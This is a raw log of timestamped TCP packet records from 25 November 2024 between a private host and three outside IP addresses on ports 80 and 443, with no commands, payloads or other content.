                                                                                                                                                  Nov 25, 2024 07:09:51.991837025 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.999943018 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.000013113 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.000103951 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.000149012 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.007069111 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.007083893 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.007222891 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.013919115 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.013932943 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.013983011 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.014008045 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.020833969 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.020844936 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.020894051 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.027893066 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.027947903 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.028084040 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.028126001 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.034358978 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.034420013 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.034451008 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.034502029 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.040967941 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.041019917 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.041055918 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.041110992 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.047240019 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.047303915 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.047350883 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.047399998 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.054677010 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.054691076 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.054923058 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.058231115 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.058243036 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.058281898 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.062829018 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.062899113 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.063003063 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.063086033 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.067527056 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.067576885 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.067692995 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.067739964 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.072464943 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.072513103 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.072640896 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.072793007 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.077146053 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.077157974 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.077240944 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.081676006 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.081736088 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.081850052 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.081891060 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.086381912 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.086548090 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.086564064 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.086611032 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.090672016 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.090719938 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.090732098 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.090779066 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.095611095 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.095659971 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.095748901 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.095799923 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.098978043 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.098992109 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.099050045 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.102035999 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.102049112 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.102447033 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.105248928 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.105262041 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.105310917 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.108256102 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.108270884 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.108324051 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.108355999 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.111346960 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.111361027 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.111411095 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.111427069 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.114413977 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.114583969 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.114609957 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.114634991 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.117548943 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.117732048 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.117774010 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.117815018 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.120630026 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.120644093 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.120968103 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.123696089 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.123789072 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.123855114 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.124102116 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.126837969 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.126910925 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.127026081 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.127074957 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.129522085 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.129573107 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.129647970 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.129688978 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.133584023 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.133599043 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.133634090 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.133646965 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.136178970 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.136353970 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.136414051 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.139379025 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.139395952 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.139446974 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.142416954 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.142465115 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.142592907 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.142643929 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.145339966 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.145400047 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.145509005 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.145561934 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.148677111 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.148689032 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.148730040 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.151740074 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.151751995 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.151782990 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.151794910 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.154747963 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.154803038 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.154895067 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.154952049 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.157820940 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.157871962 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.157994986 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.158041954 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.161017895 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.161052942 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.161103964 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.163919926 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.163985968 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.164084911 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.164129972 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.166529894 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.166594028 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.166623116 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.166665077 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.171200037 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.171214104 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.171267033 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.172993898 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.173005104 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.173074007 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.175952911 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.176024914 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.176107883 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.176150084 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.178983927 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.178997040 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.179050922 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.181813002 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.181874037 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.181981087 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.182029963 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.184797049 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.184811115 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.184858084 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.187633038 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.187804937 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.187891006 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.190491915 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.190505028 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.190617085 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.193111897 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.193233967 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.193272114 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.193458080 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.195990086 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.196002007 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.196055889 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.198451042 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.198512077 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.198745966 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.198885918 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.201163054 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.201215982 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.201349020 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.201395988 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.203836918 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.203850031 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.204930067 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.205760002 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.205815077 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.958642960 CET4980880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:09:53.078186989 CET8049808132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:53.078318119 CET4980880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:09:53.078775883 CET4980880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:09:53.198179007 CET8049808132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:54.536580086 CET8049808132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:54.549007893 CET4980880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:09:54.668438911 CET8049808132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:55.056010008 CET8049808132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:55.095979929 CET4980880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:09:55.525746107 CET49815443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:55.525796890 CET44349815172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:55.525893927 CET49815443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:55.542853117 CET49815443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:55.542882919 CET44349815172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:56.770319939 CET44349815172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:56.770409107 CET49815443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:56.775199890 CET49815443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:56.775207043 CET44349815172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:56.775604010 CET44349815172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:56.828228951 CET49815443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:56.871341944 CET44349815172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:57.209762096 CET44349815172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:57.209923983 CET44349815172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:57.210042000 CET49815443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:57.219996929 CET49815443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:57.234265089 CET4980880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:09:57.353816032 CET8049808132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:57.739171028 CET8049808132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:57.746447086 CET49821443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:57.746476889 CET44349821172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:57.749058008 CET49821443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:57.749434948 CET49821443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:57.749447107 CET44349821172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:57.783586979 CET4980880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:09:59.058844090 CET44349821172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:59.061567068 CET49821443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:59.061587095 CET44349821172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:59.525197029 CET44349821172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:59.525342941 CET44349821172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:59.525556087 CET49821443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:59.525914907 CET49821443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:09:59.529634953 CET4980880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:09:59.530951023 CET4982680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:09:59.649492025 CET8049808132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:59.649585962 CET4980880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:09:59.650428057 CET8049826132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:59.650507927 CET4982680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:09:59.650675058 CET4982680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:09:59.770121098 CET8049826132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:02.392956972 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:02.393028975 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:10:04.754462004 CET8049826132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:04.755840063 CET49838443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:04.755876064 CET44349838172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:04.756011009 CET49838443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:04.756304979 CET49838443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:04.756314993 CET44349838172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:04.799293041 CET4982680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:05.967865944 CET44349838172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:05.970580101 CET49838443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:05.970597029 CET44349838172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:06.599773884 CET44349838172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:06.599836111 CET44349838172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:06.599953890 CET49838443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:06.600867033 CET49838443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:06.607743979 CET4984680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:06.728499889 CET8049846132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:06.728588104 CET4984680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:06.728753090 CET4984680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:06.848239899 CET8049846132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:09.312534094 CET8049846132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:09.314323902 CET49852443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:09.314387083 CET44349852172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:09.314770937 CET49852443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:09.315450907 CET49852443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:09.315468073 CET44349852172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:09.363933086 CET4984680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:10.623887062 CET44349852172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:10.625988960 CET49852443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:10.626013994 CET44349852172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:11.085382938 CET44349852172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:11.085469961 CET44349852172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:11.085525990 CET49852443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:11.086040020 CET49852443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:11.089905977 CET4984680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:11.091133118 CET4985880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:11.209732056 CET8049846132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:11.209817886 CET4984680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:11.210609913 CET8049858132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:11.210695028 CET4985880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:11.210953951 CET4985880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:11.330387115 CET8049858132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:12.638983011 CET8049858132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:12.640631914 CET49862443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:12.640685081 CET44349862172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:12.640850067 CET49862443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:12.641283989 CET49862443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:12.641302109 CET44349862172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:12.689860106 CET4985880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:13.853091002 CET44349862172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:13.854945898 CET49862443192.168.2.6172.67.177.134
